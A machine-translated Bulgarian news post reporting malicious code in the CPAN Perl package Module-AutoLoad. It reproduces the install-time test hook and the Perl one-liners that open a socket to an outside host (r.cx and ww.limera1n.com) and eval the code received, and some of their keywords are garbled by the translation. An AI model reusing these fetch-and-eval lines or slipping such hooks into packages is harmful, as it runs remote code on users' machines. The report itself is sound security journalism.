ProHoster > Блог > интернет новини > Открит е зловреден код в пакета Module-AutoLoad Perl

Открит е зловреден код в пакета Module-AutoLoad Perl

В пакет Perl, разпространяван чрез директорията CPAN Модул-Автозареждане, проектиран да зарежда автоматично CPAN модули в движение, идентифициран зловреден код. Злонамерената вложка беше намерено в тестовия код 05_rcx.t, който се доставя от 2011 г.
Трябва да се отбележи, че възникнаха въпроси относно зареждането на съмнителен код Stackoverflow още през 2016 г.

Злонамерената дейност се свежда до опит за изтегляне и изпълнение на код от сървър на трета страна (http://r.cx:1/) по време на изпълнението на тестов пакет, стартиран при инсталирането на модула. Предполага се, че кодът, първоначално изтеглен от външния сървър, не е злонамерен, но сега заявката се пренасочва към домейна ww.limera1n.com, който предоставя своята част от кода за изпълнение.

За да организирате изтеглянето във файл 05_rcx.t Използва се следният код:

моята $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Посоченият код кара скрипта да бъде изпълнен ../contrib/RCX.pl, чието съдържание е сведено до реда:

използвайте lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Този скрипт се зарежда объркан използване на услугата perlobfuscator.com код от външния хост r.cx (кодове на символи 82.46.99.88 съответстват на текста "R.cX") и го изпълнява в блока eval.

$ perl -MIO::Socket -e'$b=нов IO::Socket::INET 82.46.99.88.":1″; печат <$b>;'
eval разопаковане u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

След разопаковането в крайна сметка се изпълнява следното: код:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Проблемният пакет вече е премахнат от хранилището. PAUSE (Perl Authors Upload Server) и акаунтът на автора на модула е блокиран. В този случай модулът все още остава на разположение в архива на MetaCPAN и може да се инсталира директно от MetaCPAN с помощта на някои помощни програми като cpanminus. Отбелязва сече пакетът не е бил широко разпространен.

Интересно за обсъждане свързан и авторът на модула, който отрече информацията, че след хакването на сайта му “r.cx” е бил вмъкнат зловреден код и обясни, че просто се е забавлявал и е използвал perlobfuscator.com не за да скрие нещо, а за да намали размера на кода и опростяване на копирането му през клипборда. Изборът на името на функцията „botstrap“ се обяснява с факта, че тази дума „звучи като bot и е по-кратка от bootstrap“. Авторът на модула също така увери, че идентифицираните манипулации не извършват злонамерени действия, а само демонстрират зареждането и изпълнението на код чрез TCP.

Източник: opennet.ru

Добавяне на нов коментар